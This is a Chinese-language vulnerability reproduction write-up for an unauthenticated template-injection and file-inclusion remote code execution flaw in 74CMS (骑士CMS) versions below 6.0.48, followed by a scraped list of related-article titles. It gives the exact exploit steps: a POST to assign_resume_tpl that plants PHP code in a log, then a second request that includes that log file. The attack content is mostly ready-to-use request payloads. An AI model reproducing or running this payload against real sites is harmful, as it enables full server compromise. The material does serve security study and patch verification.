骑士CMS模版注入+文件包含getshell复现
声明
好好学习,天天向上
漏洞描述
骑士cms人才系统,是一项基于PHP+MYSQL为核心开发的一套免费 + 开源专业人才网站系统。软件具执行效率高、模板自由切换、后台管理功能方便等诸多优秀特点。
骑士 CMS 官方发布安全更新,修复了一处远程代码执行漏洞。由于骑士 CMS 某些函数存在过滤不严格,攻击者通过构造恶意请求,配合文件包含漏洞可在无需登录的情况下执行任意代码,控制服务器。
影响范围
骑士 CMS < 6.0.48
复现过程
这里使用6.0.20版本
使用phpstudy小白皮,好用的1P
74cms下载地址
http://www.74cms.com/download/index.html
环境启动后,访问
http://192.168.31.61/upload/install.php
安装过程还是很简单的
安装后,访问
http://192.168.31.61/upload/index.php
使用火狐hackbar发送POST
http://192.168.31.61/upload/index.php?m=home&a=assign_resume_tpl
variable=1&tpl=<?php phpinfo(); ob_flush();?>/r/n<qscms/company_show 列表名="info" 企业id="$_GET['id']"/>
可以看到日志记录
包含这条日志,注意路径和日志名称
http://192.168.31.61/upload/index.php?m=home&a=assign_resume_tpl
variable=1&tpl=data/Runtime/Logs/Home/21_02_05.log
骑士CMS模版注入+文件包含getshell复现相关推荐
- (环境搭建+复现)74CMS模版注入+文件包含getshell
0x00 简介 骑士CMS人才招聘系统是基于PHP+MYSQL的免费网站管理系统源码,提供完善的人才招聘网站建设方案. 0x01 漏洞概述 骑士 CMS 官方发布安全更新,修复了一处远程代码执行漏洞. ...
- 骑士cms文件包含getshell复现
00X1 测试环境 骑士 CMS 6.0.48以下均存在此漏洞,本文复现使用骑士cms 6.0.20,下载地址: http://www.74cms.com/download/index.html 注意 ...
- php excel中解析显示html代码_骑士cms从任意文件包含到远程代码执行漏洞分析
前言 前些日子,骑士cms 官方公布了一个系统紧急风险漏洞升级通知:骑士cms 6.0.48存在一处任意文件包含漏洞,利用该漏洞对payload文件进行包含,即可造成远程代码执行漏洞.这篇文章将从漏洞 ...
- index.php.bak 颓废_CVE-2018-12613-phpmyadmin4.8.1远程文件包含漏洞复现
CVE-2018-12613-phpmyadmin4.8.1远程文件包含漏洞复现 By:Mirror王宇阳 漏洞原理 攻击者利用发现在服务器上包含(查看和潜在执行)文件的漏洞.该漏洞来自一部分代码,其 ...
- [HXBCTF 2021]easywill writeup(WillPHP源码审计+利用pearcmd.php文件包含getshell)
[HXBCTF 2021]easywill writeup(WillPHP源码审计+利用pearcmd.php文件包含getshell) [HXBCTF 2021]easywill 1.WillPHP ...
- cms php vue 开源_骑士CMS文件包含+getshell
0x00简单介绍 骑士cms人才系统,是一项基于php+mysql为核心的开源人才网站系统. 0x01漏洞概述 骑士cms官方发布安全更新,修复了一处远程代码执行漏洞.由于骑士cms某些函数过滤不严谨 ...
- [网络安全自学篇] 四十.phpMyAdmin 4.8.1后台文件包含缺陷复现及防御措施(CVE-2018-12613)
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步.前文通过两个题目分享了DirBuster扫描目录.Fuzzy爆破指定路径名称,通 ...
- phpmyadminV4.8.1本地文件包含漏洞复现
文章目录 一.phpMyadmin简介 二.什么是文件包含漏洞? 三.本地包含和远程包含 四.文件包含相关函数介绍 1.函数介绍 2.报错 3._once 4.小结 五.关于windows特性的一个小 ...
- 【CVE-2018-12613】phpmyadmin 4.8.1 远程文件包含漏洞复现
**环境:**http://62.234.56.138:8080/server_databases.php 官网下载phpmyadmin 4.8.1 源码:index.php文件中 函数含义: tar ...
最新文章
- Julia数据统计最全教程,代码图解全都有,昆士兰大学出品,公开免费阅读
- java 虚拟机_浅谈Java虚拟机内存区
- when is oPropagatedProperties of detail view being generated
- MockupBuilder
- Oracle工具之--ASM与文件系统及跨网络传输文件
- java运算符 —(5)
- 数据结构基础:算法的基础知识笔记
- MySQL命令:增删与改
- 转:Linux网络IO并行化技术概览
- 支付宝超硬硬件发布: 将颠覆现有支付方式!
- 一只踏入持续学习路上的程序猿
- 一款Java开源的Springboot 即时通讯 IM 聊天系统,附源码下载地址!
- list index out of range
- Python简单爬虫(以爬取豆瓣高分图书为例)
- leetcode小坑 ‘int’ object has no attribute ‘val‘
- css 使盒子之间有间距 两边对齐
- 【技术分享】Win10 wampserver升级安装php7.2.32
- 概率论与数理统计学习笔记——第13讲——依概率收敛的意义
- iOS 10权限设置
- 爬取搜搜问问的一个实例
热门文章
- fastJson 将json转换成LinkedHashmap,全部有序
- android sd卡获取不到,解决Android10读取不到/sdcard/、/storage/emulated/0/文件的问题
- 简单的记录一下使用HAL库的SPI外挂W25Q32
- HTML用户名判断,用户名判断(练习)
- 权重推送 产品定位 直通车投放 关键词 直通车人群 创意标题 补单 新手上路,直通车烧钱没效果怎么办?
- AC Dream1069
- 用文件保存游戏服务器数据恢复,玩植物大战僵尸等单机游戏时,存档丢失了怎么数据恢复?...
- 简单使用萤石云,实时直播,监控回放
- 农信计算机资料录入试题,农村信用社计算机考试试题.docx
- DApp 上线 BitPortal币通钱包申请指南